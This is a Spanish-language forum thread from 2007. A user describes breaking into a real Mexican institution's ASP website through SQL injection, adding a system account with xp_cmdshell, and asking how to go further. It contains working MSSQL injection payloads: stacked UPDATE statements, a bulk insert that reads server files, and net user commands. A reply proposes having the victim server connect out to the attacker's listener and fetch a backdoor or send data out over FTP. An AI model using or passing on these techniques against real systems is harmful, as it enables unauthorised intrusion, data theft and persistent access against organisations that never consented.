|
Título: sql injection en asp Publicado por: wizache en 20 Julio 2007, 21:10 pm Hola!, de nuevo aqui preguntando sobre sql injection, y es que resulta que en cierta pagina, he encontrado varias vulnerabilidades, la que estoy usando esta en un catalogo, el chiste es que hay puedo hacer de todo, ya probe desde un simple union select, hasta un update, delete, etc, saque todas las columnas, tablas, etc,etc. y parece ser que se peuden ejecutar comandos de mssql como ;exec ..master ....... (incluso me agregue un usuario a su sistema :P)
Es la primera página con ese grado de importancia(es una institucion relativamente importante de mexico) con una vulnerabilidad de sql injection tan grave. Bueno quiero aprovechar esta pagina para probar inyecciones mas avanzadas y practicar un poco este tema en cosas mas relevantes que agregar leer o borrar datos, tipo las que se muestran en el ya conocido texto http://www.ngssoftware.com/papers/advanced_sql_injection.pdf (http://www.ngssoftware.com/papers/advanced_sql_injection.pdf). Ahora la pregunta: 1. Es posible ejecutar en el shell intrucciones como por ejemplo "dir"(exec master..xp_cmdshell 'dir') y que el resultado se muestre en alguna columna del catalogo con un UNION. 2. Me parece que el usuario que agregue al sistema (exec master..xp_cmdshell 'ne user /add ...etc),se agrego correctamente pero no me he podido conectar para probarlo, intente con el escritorio remoto que viene en el windows pero namas no, de que otra forma me podria conectar remotamente al servidor y utilizar mi usuario creado 3.¿ hay alguna intruccion para por ejemplo crear un archivo en el servidor?? ¿que otra cosa creen que podria probar? En lo que puedan ayudarme esta perfecto nota: todas las intrucciones las agrego despues de un ; por ejemplo apra un update lo estoy ahciendo así: q'; UPDATE SET columna='valor' WHERE condicion --- Saludos! :xD Título: Re: sql injection algo mas avanzado en asp Publicado por: wizache en 20 Julio 2007, 21:25 pm Otra pregunta, siguiendo ejemplos del manual, quize hacer esto:
p';bulk insert foo from 'c:\inetpub\wwwroot\Default.aspx''-- para insertar en una tabla que ya cree(foo) dicho documento y me devuelve este error: Could not bulk insert because file 'c:\inetpub\wwwroot\Default.aspx' could not be opened. Operating system error code 3(The system cannot find the path specified.). Que segun yo es por que no encontro el archivo.(la pagina de inicio es la de defaul.aspx) La pregunta, es un IIS 6.0, cual es la carpeta "root" por defecto, ¿si es c:\inetpub\wwwroot\? saludos Título: Re: sql injection algo mas avanzado en asp Publicado por: yeikos en 25 Julio 2007, 00:09 am Para saber si la cuenta de usuario tiene los suficientes privilegios como para ejecutar archivos puedes ponerte a la escucha del puerto 85 y ejecutar lo siguiente en el equipo vulnerable:
Código: cmd.exe /c telnet o 127.0.0.1 85 Si al realizar la consulta detectas una conexión entrante al puerto 85, es que la cuenta de usuario tiene los permisos suficientes como para ejecutar archivos, pero esto no quiere decir que los tenga para crear cuentas, así que lo que podemos hacer ahora es reunir información y subirlos a nuestro servidor vía FTP (BATH) o directamente obtar por crear una simple aplicación en BATH para que baje algún backdoor vía FTP... |